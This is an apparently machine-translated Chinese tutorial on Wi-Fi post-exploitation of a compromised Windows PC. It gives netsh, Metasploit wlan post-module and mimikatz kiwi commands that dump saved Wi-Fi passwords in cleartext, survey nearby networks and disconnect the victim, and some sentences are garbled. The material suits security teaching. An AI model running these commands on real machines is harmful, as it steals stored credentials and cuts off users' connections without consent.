Wifi在远程PC上的后期开发

 

大多数Wi-Fi网络的安全协议经常被破坏或绕过,从而将无线互联网流量暴露给攻击者。通过本文,我们可以了解获取远程用户Wi-Fi基本服务集信息的不同方法以及当前网络连接信息,以及如何提取远程PC的已保存无线局域网配置文件,之后您将断开目标用户的Wi-也是。以下所有攻击都是后期攻击。

表中的内容

  • 介绍

  • 使用Wi-Fi

  • Wi-Fi安全类型

  • WLAN BSS列表

  • WLAN当前连接

  • WLAN配置文件

  • WLAN断开连接

  • Mimikatz

  • Netsh的

介绍

所有无线网络技术通常称为Wi-Fi。它提供高速互联网,因为它适用于无线电波。Wi-Fi商标归Wi-Fi联盟所有; 它正式定义为无线局域网(WLAN)。它受到许多应用程序和设备的支持,例如移动电话, PDA ,操作系统,视频游戏控制台等,因此,它可以让所有设备轻松进行通信。

使用Wi-Fi

顾名思义, Wi-Fi 网络在发送方和接收方之间没有物理连接。它使用与无线电波相关的电磁频谱内的射频。因此,它能够提供高速互联网。每个Wi-Fi连接都通过接入点(AP)工作。接入点的主要工作是广播电子设备进一步检测到的信号。在检测到信号时,他们连接到Wi-Fi以使用Wi-Fi。

Wi-Fi安全类型

  • 有线等效保密

  • Wi-Fi保护访问

  • Wi-Fi保护访问2

Netsh的

现在你有一个受害者PC的会话,转到shell并使用以下命令找出受害者PC随时间的Wi-Fi连接;

 

1

netsh wlan show profiles

 

201907151563204690122440.png

如上图所示,到目前为止,PC连接到Pentest Lab,Sinos,POCO PHONE,点燃。现在,我们可以使用以下内容获取有关网络的详细信息:

 

1

netsh wlan show networks mode=bssid

201907151563204722117833.png

现在,使用以下命令查看特定Wi-Fi的密码:

 

1

netsh wlan show profile name="ignit" key=clear

201907151563204744662110.png

WLAN BSS列表

此模块收集有关受害计算机可用的无线基本服务集的信息。

例如,这将为您提供有关无线连接的SSID和其他重要信息。

 

1

2

3

msf > use post/windows/wlan/wlan_bss_list

msf post(wlan_bss_list) > set session 5

msf post(wlan_bss_list) > exploit

从下面给出的图像你可以看到它在这里发现了“5个网络”,如Pen lab,Sinos,Ignite等以及它们的基本3个细节

201907151563204340125566.png

WLAN当前连接

此模块收集有关目标计算机上每个无线LAN接口上的当前连接的信息。

 

1

2

3

msf > use post/windows/wlan/wlan_current_connection

msf post(wlan_current_connection) > set session 5

msf post(wlan_current_connection) > run

下面给出的图像已经公开了“笔实验室”是受害者连接的当前连接,而且它已经显示了一些基本细节,例如路由器的MAC地址,安全状态,认证类型等。  

201907151563204381116562.png

WLAN配置文件

此模块提取已保存的无线LAN配置文件 它还将尝试解密网络密钥材料。在WPA中,OS版本之间的行为略有不同。在Windows Vista / 7中,我们将获得密码。在Windows XP中,我们将获得PBKDF2派生的密钥。

 

1

2

3

msf post> use post/windows/wlan/wlan_profile

msf post(wlan_profile) > set session 5

msf post(wlan_profile) > exploit

从下面给出的图像中你可以看到它已经提取了受害者连接的wifi配置文件,而且它还解密了共享密钥(密码)。因此,您可以确认“Pen Lab”的密码是“ ignite @ 123 ”。  

201907151563204423174456.png

WLAN断开连接

此模块断开指定接口上的当前无线网络连接。

 

1

2

3

msf > use post/windows/wlan/wlan_disconnect

msf post(wlan_bss_list) > set session 5

msf post(wlan_disconnect) > exploit

从下面的图像中,您可以确认它正在断开受害者与当前无线网络的连接。

201907151563204483576258.png

Mimikatz

我将其称为后期利用工具包,因为它具有许多功能,远远超出了转储纯文本密码的能力。

 

1

meterpreter > load kiwi

 

201907151563204515273022.png

 

1

meterpreter > help

这将为您提供包含密码的整个无线连接列表。瞧!你做对了。

 

1

2

meterpreter > wifi_list

meterpreter > wifi_list_shared

  从下面给出的图像中,您可以确认它已转储所有共享密钥(密码)并验证其各自的SSID。

201907151563204978509345.png

关于作者

Nisha Yadav接受过道德认证和Bug Bounty Hunter培训。她目前在Hiddenramp担任安全分析师。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章